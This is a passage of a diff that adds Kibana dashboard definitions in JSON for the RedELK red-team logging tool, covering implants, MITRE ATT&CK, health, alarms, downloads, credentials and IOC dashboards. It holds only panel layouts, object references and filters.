"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + }, + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "948c1286-d4de-44a6-8fb2-95bf9252ed00:panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", + "type": "visualization" + }, + { + "id": "56350050-efe7-11eb-8a9f-2572da287875", + "name": "ab9eb0fb-a164-4295-8177-865a2a67dccb:panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", + "type": "visualization" + }, + { + "id": "d625ba60-efe8-11eb-8a9f-2572da287875", + "name": "c630a33e-6a98-466d-8223-fd83e6947b8c:panel_c630a33e-6a98-466d-8223-fd83e6947b8c", + "type": "visualization" + }, + { + "id": "dd9e9510-efec-11eb-8a9f-2572da287875", + "name": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a:panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", + "type": "map" + }, + { + "id": "be08d380-efe9-11eb-8a9f-2572da287875", + "name": "fc254327-57ac-4e5f-88f7-a32d48570289:panel_fc254327-57ac-4e5f-88f7-a32d48570289", + "type": "visualization" + }, + { + "id": "cbb7d710-efee-11eb-8a9f-2572da287875", + "name": "829f61cf-9374-4bb5-8214-34e6875e79da:panel_829f61cf-9374-4bb5-8214-34e6875e79da", + "type": "visualization" + }, + { + "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", + "name": "0bc5f60b-f940-451a-886b-edff3512d180:panel_0bc5f60b-f940-451a-886b-edff3512d180", + "type": "search" + } + ], + "sort": [ + 1643016059071, + 291 + ], + "type": "dashboard", + "version": "1" + }, + { + "attributes": { + "description": "RedELK implants dashboard", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "tags", + "negate": true, + "params": { + "query": "sandboxes_v01" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "tags": "sandboxes_v01" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "key": "tags", + "negate": true, + "params": { + "query": "testsystems_v01" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "tags": "testsystems_v01" + } + } + } + ], + "query": { + "language": "lucene", + "query": "" + } + } + }, + "optionsJSON": { + "darkTheme": false, + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "1", + "w": 24, + "x": 0, + "y": 2 + }, + "panelIndex": "1", + "panelRefName": "panel_1", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "2", + "w": 24, + "x": 24, + "y": 2 + }, + "panelIndex": "2", + "panelRefName": "panel_2", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "3", + "w": 24, + "x": 0, + "y": 17 + }, + "panelIndex": "3", + "panelRefName": "panel_3", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 22, + "i": "4", + "w": 48, + "x": 0, + "y": 32 + }, + "panelIndex": "4", + "panelRefName": "panel_4", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "5", + "w": 24, + "x": 24, + "y": 17 + }, + "panelIndex": "5", + "panelRefName": "panel_5", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 2, + "i": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c", + "panelRefName": "panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 19, + "i": "b9915fcd-f22e-4326-986a-25684f947b79", + "w": 48, + "x": 0, + "y": 54 + }, + "panelIndex": "b9915fcd-f22e-4326-986a-25684f947b79", + "panelRefName": "panel_b9915fcd-f22e-4326-986a-25684f947b79", + "type": "search", + "version": "7.8.0" + } + ], + "refreshInterval": { + "pause": false, + "value": 30000 + }, + "timeFrom": "now-30d", + "timeRestore": true, + "timeTo": "now", + "title": "RedELK - Implants dashboard", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + }, + { + "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", + "name": "1:panel_1", + "type": "visualization" + }, + { + "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", + "name": "2:panel_2", + "type": "visualization" + }, + { + "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", + "name": "3:panel_3", + "type": "visualization" + }, + { + "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", + "name": "4:panel_4", + "type": "visualization" + }, + { + "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", + "name": "5:panel_5", + "type": "visualization" + }, + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c:panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", + "type": "visualization" + }, + { + "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", + "name": "b9915fcd-f22e-4326-986a-25684f947b79:panel_b9915fcd-f22e-4326-986a-25684f947b79", + "type": "search" + } + ], + "sort": [ + 1642171876916, + 56 + ], + "type": "dashboard", + "version": "1" + }, + { + "attributes": { + "description": "MITRE ATT&CK dashboard showing TTPs used (SIEM detection must be configured first)", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 17, + "i": "e4271670-160e-444d-bb78-46ae1e1c7339", + "w": 21, + "x": 0, + "y": 2 + }, + "panelIndex": "e4271670-160e-444d-bb78-46ae1e1c7339", + "panelRefName": "panel_e4271670-160e-444d-bb78-46ae1e1c7339", + "title": "MITRE ATT&CK Tactics", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 17, + "i": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8", + "w": 27, + "x": 21, + "y": 2 + }, + "panelIndex": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8", + "panelRefName": "panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", + "title": "MITRE ATT&CK Techniques", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "de3ced26-2a55-43f5-af28-dc5c2b967c29", + "w": 24, + "x": 0, + "y": 19 + }, + "panelIndex": "de3ced26-2a55-43f5-af28-dc5c2b967c29", + "panelRefName": "panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "38e24827-8707-4583-805a-98e4138495a7", + "w": 24, + "x": 24, + "y": 19 + }, + "panelIndex": "38e24827-8707-4583-805a-98e4138495a7", + "panelRefName": "panel_38e24827-8707-4583-805a-98e4138495a7", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "60dc249a-1ad0-456c-850b-95c77ea0bc18", + "w": 48, + "x": 0, + "y": 34 + }, + "panelIndex": "60dc249a-1ad0-456c-850b-95c77ea0bc18", + "panelRefName": "panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", + "type": "search", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 2, + "i": "3b895da0-50d0-49e0-a18d-790fd2dddaaa", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "3b895da0-50d0-49e0-a18d-790fd2dddaaa", + "panelRefName": "panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", + "type": "visualization", + "version": "7.8.0" + } + ], + "timeRestore": false, + "title": "RedELK - MITRE ATT&CK", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", + "name": "e4271670-160e-444d-bb78-46ae1e1c7339:panel_e4271670-160e-444d-bb78-46ae1e1c7339", + "type": "visualization" + }, + { + "id": "abdcd940-d050-11ea-9301-a30a04251ae9", + "name": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8:panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", + "type": "visualization" + }, + { + "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", + "name": "de3ced26-2a55-43f5-af28-dc5c2b967c29:panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", + "type": "visualization" + }, + { + "id": "231792d0-d050-11ea-9301-a30a04251ae9", + "name": "38e24827-8707-4583-805a-98e4138495a7:panel_38e24827-8707-4583-805a-98e4138495a7", + "type": "visualization" + }, + { + "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", + "name": "60dc249a-1ad0-456c-850b-95c77ea0bc18:panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", + "type": "search" + }, + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "3b895da0-50d0-49e0-a18d-790fd2dddaaa:panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", + "type": "visualization" + } + ], + "sort": [ + 1642171876916, + 63 + ], + "type": "dashboard", + "version": "1" + }, + { + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 2, + "i": "5f3b82fd-613e-460e-a5a3-b7a9c9036060", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "5f3b82fd-613e-460e-a5a3-b7a9c9036060", + "panelRefName": "panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", + "type": "visualization", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 2, + "i": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", + "w": 48, + "x": 0, + "y": 2 + }, + "panelIndex": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", + "panelRefName": "panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", + "type": "visualization", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 7, + "i": "cd30bef4-7955-437a-adaf-317839c35931", + "w": 16, + "x": 0, + "y": 4 + }, + "panelIndex": "cd30bef4-7955-437a-adaf-317839c35931", + "panelRefName": "panel_cd30bef4-7955-437a-adaf-317839c35931", + "type": "visualization", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 18, + "i": "cc62352b-f1ed-47fb-9687-d51a44693d13", + "w": 21, + "x": 16, + "y": 4 + }, + "panelIndex": "cc62352b-f1ed-47fb-9687-d51a44693d13", + "panelRefName": "panel_cc62352b-f1ed-47fb-9687-d51a44693d13", + "type": "search", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 18, + "i": "1d8af391-0559-412f-a001-12acc85b49ab", + "w": 11, + "x": 37, + "y": 4 + }, + "panelIndex": "1d8af391-0559-412f-a001-12acc85b49ab", + "panelRefName": "panel_1d8af391-0559-412f-a001-12acc85b49ab", + "type": "visualization", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "cd45ce11-0279-476b-90c3-bd5733193a72", + "w": 16, + "x": 0, + "y": 11 + }, + "panelIndex": "cd45ce11-0279-476b-90c3-bd5733193a72", + "panelRefName": "panel_cd45ce11-0279-476b-90c3-bd5733193a72", + "type": "visualization", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 16, + "i": "aa8ee839-556c-47ce-81af-451090b86f71", + "w": 48, + "x": 0, + "y": 22 + }, + "panelIndex": "aa8ee839-556c-47ce-81af-451090b86f71", + "panelRefName": "panel_aa8ee839-556c-47ce-81af-451090b86f71", + "type": "search", + "version": "7.10.0" + } + ], + "refreshInterval": { + "pause": true, + "value": 0 + }, + "timeFrom": "now-15y", + "timeRestore": true, + "timeTo": "now", + "title": "RedELK - Health", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "509e6a80-926a-11eb-a753-9da683898c26", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "5f3b82fd-613e-460e-a5a3-b7a9c9036060:panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", + "type": "visualization" + }, + { + "id": "45491770-0886-11eb-a2d2-171dc8941414", + "name": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2:panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", + "type": "visualization" + }, + { + "id": "20fac240-926c-11eb-a753-9da683898c26", + "name": "cd30bef4-7955-437a-adaf-317839c35931:panel_cd30bef4-7955-437a-adaf-317839c35931", + "type": "visualization" + }, + { + "id": "87530b40-9269-11eb-a753-9da683898c26", + "name": "cc62352b-f1ed-47fb-9687-d51a44693d13:panel_cc62352b-f1ed-47fb-9687-d51a44693d13", + "type": "search" + }, + { + "id": "2f971ac0-926b-11eb-a753-9da683898c26", + "name": "1d8af391-0559-412f-a001-12acc85b49ab:panel_1d8af391-0559-412f-a001-12acc85b49ab", + "type": "visualization" + }, + { + "id": "2f77a150-926a-11eb-a753-9da683898c26", + "name": "cd45ce11-0279-476b-90c3-bd5733193a72:panel_cd45ce11-0279-476b-90c3-bd5733193a72", + "type": "visualization" + }, + { + "id": "654f76a0-9269-11eb-a753-9da683898c26", + "name": "aa8ee839-556c-47ce-81af-451090b86f71:panel_aa8ee839-556c-47ce-81af-451090b86f71", + "type": "search" + } + ], + "sort": [ + 1642171876916, + 71 + ], + "type": "dashboard", + "version": "1" + }, + { + "attributes": { + "description": "RedELK alarms dashboard", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 2, + "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", + "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "74b481ca-ae10-4039-b6bf-474b5a409c0e", + "w": 18, + "x": 0, + "y": 2 + }, + "panelIndex": "74b481ca-ae10-4039-b6bf-474b5a409c0e", + "panelRefName": "panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", + "title": "Alarmed IOC over time", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "13abf5b9-28bf-4d51-9c63-2416603499e7", + "w": 6, + "x": 18, + "y": 2 + }, + "panelIndex": "13abf5b9-28bf-4d51-9c63-2416603499e7", + "panelRefName": "panel_13abf5b9-28bf-4d51-9c63-2416603499e7", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "e146bc43-4ec7-4fbb-8dcf-3df505b52932", + "w": 6, + "x": 24, + "y": 2 + }, + "panelIndex": "e146bc43-4ec7-4fbb-8dcf-3df505b52932", + "panelRefName": "panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "c8ae192f-f081-49eb-8e60-3122d0377314", + "w": 18, + "x": 30, + "y": 2 + }, + "panelIndex": "c8ae192f-f081-49eb-8e60-3122d0377314", + "panelRefName": "panel_c8ae192f-f081-49eb-8e60-3122d0377314", + "title": "Alarmed traffic over time", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 14, + "i": "b95813af-9600-4e44-93de-9acfaa6f911c", + "w": 48, + "x": 0, + "y": 13 + }, + "panelIndex": "b95813af-9600-4e44-93de-9acfaa6f911c", + "panelRefName": "panel_b95813af-9600-4e44-93de-9acfaa6f911c", + "title": "Alarmed IOC", + "type": "search", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 17, + "i": "67fd9bda-6d1a-4089-a588-b683ad113558", + "w": 48, + "x": 0, + "y": 27 + }, + "panelIndex": "67fd9bda-6d1a-4089-a588-b683ad113558", + "panelRefName": "panel_67fd9bda-6d1a-4089-a588-b683ad113558", + "title": "Alarmed traffic", + "type": "search", + "version": "7.8.0" + } + ], + "timeRestore": false, + "title": "RedELK - Alarms dashboard", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", + "type": "visualization" + }, + { + "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", + "name": "74b481ca-ae10-4039-b6bf-474b5a409c0e:panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", + "type": "visualization" + }, + { + "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", + "name": "13abf5b9-28bf-4d51-9c63-2416603499e7:panel_13abf5b9-28bf-4d51-9c63-2416603499e7", + "type": "visualization" + }, + { + "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", + "name": "e146bc43-4ec7-4fbb-8dcf-3df505b52932:panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", + "type": "visualization" + }, + { + "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", + "name": "c8ae192f-f081-49eb-8e60-3122d0377314:panel_c8ae192f-f081-49eb-8e60-3122d0377314", + "type": "visualization" + }, + { + "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", + "name": "b95813af-9600-4e44-93de-9acfaa6f911c:panel_b95813af-9600-4e44-93de-9acfaa6f911c", + "type": "search" + }, + { + "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", + "name": "67fd9bda-6d1a-4089-a588-b683ad113558:panel_67fd9bda-6d1a-4089-a588-b683ad113558", + "type": "search" + } + ], + "sort": [ + 1642171876916, + 79 + ], + "type": "dashboard", + "version": "1" + }, + { + "attributes": { + "description": "RedELK downloads dashboard", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 3, + "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", + "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", + "type": "visualization", + "version": "7.16.3" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2", + "w": 24, + "x": 0, + "y": 3 + }, + "panelIndex": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2", + "panelRefName": "panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", + "type": "visualization", + "version": "7.16.3" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", + "w": 7, + "x": 24, + "y": 3 + }, + "panelIndex": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", + "panelRefName": "panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", + "type": "visualization", + "version": "7.16.3" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "55aca97f-b1f0-43b1-af44-756fe59be5fc", + "w": 17, + "x": 31, + "y": 3 + }, + "panelIndex": "55aca97f-b1f0-43b1-af44-756fe59be5fc", + "panelRefName": "panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", + "type": "visualization", + "version": "7.16.3" + }, + { + "embeddableConfig": { + "enhancements": {}, + "sort": [ + "@timestamp", + "desc", + [ + "@timestamp", + "desc" + ] + ] + }, + "gridData": { + "h": 16, + "i": "9a987436-c698-4236-9b92-bfab81de8cc1", + "w": 48, + "x": 0, + "y": 14 + }, + "panelIndex": "9a987436-c698-4236-9b92-bfab81de8cc1", + "panelRefName": "panel_9a987436-c698-4236-9b92-bfab81de8cc1", + "type": "search", + "version": "7.16.3" + } + ], + "timeRestore": false, + "title": "RedELK - Downloads dashboard", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "643de010-d04c-11ea-9301-a30a04251ae9", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", + "type": "visualization" + }, + { + "id": "85446c80-d04b-11ea-9301-a30a04251ae9", + "name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", + "type": "visualization" + }, + { + "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", + "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", + "type": "visualization" + }, + { + "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", + "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", + "type": "visualization" + }, + { + "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", + "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", + "type": "search" + } + ], + "sort": [ + 1643016103992, + 297 + ], + "type": "dashboard", + "version": "1" + }, + { + "attributes": { + "description": "RedELK credentials dashboard", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 2, + "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", + "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", + "w": 24, + "x": 0, + "y": 2 + }, + "panelIndex": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", + "panelRefName": "panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", + "title": "Credentials over time", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "8c5ea210-ef6d-47a3-958b-16ccc6006582", + "w": 7, + "x": 24, + "y": 2 + }, + "panelIndex": "8c5ea210-ef6d-47a3-958b-16ccc6006582", + "panelRefName": "panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", + "title": "Total credentials", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "b98cc0b8-ee93-4d34-b458-cd311eb995ea", + "w": 17, + "x": 31, + "y": 2 + }, + "panelIndex": "b98cc0b8-ee93-4d34-b458-cd311eb995ea", + "panelRefName": "panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", + "title": "Credentials realms", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 19, + "i": "77f94499-3c4b-49c0-8379-62d38f4d7d8e", + "w": 48, + "x": 0, + "y": 13 + }, + "panelIndex": "77f94499-3c4b-49c0-8379-62d38f4d7d8e", + "panelRefName": "panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", + "type": "search", + "version": "7.8.0" + } + ], + "timeRestore": false, + "title": "RedELK - Credentials dashboard", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "82b865a0-d318-11ea-9301-a30a04251ae9", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", + "type": "visualization" + }, + { + "id": "ab609c60-d319-11ea-9301-a30a04251ae9", + "name": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51:panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", + "type": "visualization" + }, + { + "id": "dcf86190-d319-11ea-9301-a30a04251ae9", + "name": "8c5ea210-ef6d-47a3-958b-16ccc6006582:panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", + "type": "visualization" + }, + { + "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", + "name": "b98cc0b8-ee93-4d34-b458-cd311eb995ea:panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", + "type": "visualization" + }, + { + "id": "3fabe620-6c38-11ea-97d6-55783aed877a", + "name": "77f94499-3c4b-49c0-8379-62d38f4d7d8e:panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", + "type": "search" + } + ], + "sort": [ + 1642171876916, + 85 + ], + "type": "dashboard", + "version": "1" + }, + { + "attributes": { + "description": "RedELK IOC dashboard", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 2, + "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", + "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "dfd53850-c595-4597-bbb5-ea03fc22e880", + "w": 24, + "x": 0, + "y": 2 + }, + "panelIndex": "dfd53850-c595-4597-bbb5-ea03fc22e880", + "panelRefName": "panel_dfd53850-c595-4597-bbb5-ea03fc22e880", + "title": "IOC over time", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "f13deeb7-53dc-41af-9de0-486d7a171916", + "w": 17, + "x": 31, + "y": 2 + }, + "panelIndex": "f13deeb7-53dc-41af-9de0-486d7a171916", + "panelRefName": "panel_f13deeb7-53dc-41af-9de0-486d7a171916", + "title": "IOC Types", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", + "w": 7, + "x": 24, + "y": 2 + }, + "panelIndex": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", + "panelRefName": "panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 19, + "i": "d492599d-f662-450b-9982-54ab7db9f174", + "w": 48, + "x": 0, + "y": 13 + }, + "panelIndex": "d492599d-f662-450b-9982-54ab7db9f174", + "panelRefName": "panel_d492599d-f662-450b-9982-54ab7db9f174", + "type": "search", + "version": "7.8.0" + } + ], + "timeRestore": false, + "title": "RedELK - IOC dashboard", + "version": 1 + 